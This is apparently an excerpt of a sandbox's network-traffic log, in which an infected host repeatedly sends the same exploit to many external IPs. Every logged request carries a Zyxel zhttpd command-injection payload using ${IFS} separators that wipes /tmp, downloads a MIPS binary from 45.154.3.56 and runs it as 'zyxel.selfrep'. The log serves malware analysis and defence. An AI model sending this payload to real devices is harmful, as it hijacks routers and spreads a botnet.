                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180193901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2618192.168.2.1444828213.235.92.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180257082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2619192.168.2.144665480.202.2.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180309057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2620192.168.2.1447126135.197.2.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180345058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2621192.168.2.1433514181.90.252.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180391073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2622192.168.2.1450636114.100.15.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180427074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2623192.168.2.1457450104.189.193.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180469990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2624192.168.2.1460968106.25.30.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180516005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2625192.168.2.14377361.53.26.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180567026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2626192.168.2.1459144162.247.196.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180608988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2627192.168.2.144041089.47.69.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180643082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2628192.168.2.1445090114.147.29.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180689096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2629192.168.2.14607382.62.0.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180702925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2630192.168.2.1445206203.82.161.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180767059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2631192.168.2.145578435.45.105.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180794001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2632192.168.2.144222617.15.181.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180859089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2633192.168.2.145610431.171.84.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180891037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2634192.168.2.144878687.189.181.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180927992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2635192.168.2.144458837.42.228.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180980921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2636192.168.2.1450700113.176.80.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181015015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2637192.168.2.1445458207.133.236.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181068897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2638192.168.2.1453808167.47.126.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181088924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2639192.168.2.143581488.216.28.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181142092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2640192.168.2.145741627.22.134.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181154966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2641192.168.2.144020099.204.16.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181206942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2642192.168.2.1460058184.83.221.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181231976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2643192.168.2.1434092165.207.21.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181266069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2644192.168.2.1438486117.172.223.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181313992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2645192.168.2.144135032.89.123.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181355000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2646192.168.2.1435290222.221.163.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181396008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2647192.168.2.1447816169.248.252.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181437969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2648192.168.2.145176674.172.96.120443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181499004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2649192.168.2.143928049.138.60.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181529999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2650192.168.2.1446182145.35.203.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181554079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2651192.168.2.146034082.249.84.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181592941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2652192.168.2.1458900122.157.215.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181642056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2653192.168.2.1440554158.117.80.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181696892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2654192.168.2.1456708147.212.71.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181749105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2655192.168.2.1452444221.237.0.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181787968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2656192.168.2.1445392195.148.222.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181823015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2657192.168.2.1452738135.169.218.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181869030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2658192.168.2.145126298.214.62.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181891918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2659192.168.2.144709249.78.50.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181941032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2660192.168.2.1459452187.65.165.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.181988955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2661192.168.2.1456654217.69.238.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182020903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2662192.168.2.144731893.119.225.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182059050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2663192.168.2.145996073.177.60.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182090998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2664192.168.2.1436564102.188.36.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182132006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2665192.168.2.1456196209.6.115.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182173967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2666192.168.2.1435572152.12.106.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182195902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2667192.168.2.1433934116.221.172.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182250977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2668192.168.2.1442466111.37.210.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182291985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2669192.168.2.1439800120.16.19.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182348013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2670192.168.2.14358204.106.14.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182400942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2671192.168.2.1445194220.207.143.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182435036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2672192.168.2.1435882121.206.205.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182485104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2673192.168.2.1451280136.162.251.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182507038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2674192.168.2.143700657.217.24.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182554007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2675192.168.2.1438112105.218.86.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182611942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2676192.168.2.1444758103.222.85.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182641029 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2677192.168.2.1442436106.220.210.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182681084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2678192.168.2.144176466.21.143.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182725906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2679192.168.2.1448302179.250.210.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182781935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2680192.168.2.1454084166.132.68.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182827950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2681192.168.2.1448054193.151.26.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182872057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2682192.168.2.1443186165.120.104.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182900906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2683192.168.2.1454032141.201.14.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.182967901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2684192.168.2.144191463.23.194.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183000088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2685192.168.2.1447568210.103.154.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183053970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2686192.168.2.1439378189.3.35.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.183075905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


